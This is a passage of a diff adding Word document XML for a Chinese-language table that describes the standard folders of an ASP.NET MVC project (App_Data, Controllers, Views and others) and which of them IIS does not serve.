+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>文件夹及文件</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>描述</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>注</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/App_Data</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>此文件用于放置私有数据，如XML文件，或使用SQL Server Express，SQLite的数据库文件，或其他文件的存储库</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>IIS不将此文件夹的内容进行服务(意即无法通过Web来请求该目录文件)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">/App_start </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>此文件夹包含项目的一些核心配置，包括路由和过滤器的定义，以及一些内容包</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Areas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>区域是把一个大型应用程序划分为较小片段的方法</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/bin</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>为MVC应用程序编译好的程序集放在这里，连同任何被引用的包括不在GAC中的引用程序集</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>IIS不将此从文件夹的内容进行服务</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Content</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>用于放置静态内容，如CSS和图片等</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是一个约定但不是必须的，你可以把静态内容放在任何适合自己的地方</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Controllers</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>用于放置控制器类</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是一个约定，可以把控制器放在任何地方，因为它们都会被编译到同一个程序集中。</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Models</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>用于放置视图模型和域模型类，除非是最简单的应用程序，否则都能够获益于一个专用的定义域模型的程序集</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是一个约定，可以把模型放在任何地方。或是一个单独的程序集。</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Scripts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>本目录意在保存应用程序的JavaScript库</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是一个约定，你可以把脚本放在任何位置，因为它们实际上是另一种类型的静态内容。</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Views</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>保存视图和分部视图，通常按它们的控制器命名的文件夹进行分组</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Views/Web.config文件阻止IIS对这些目录的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>直接</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>访问。视图必须通过动作方法来访问。</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
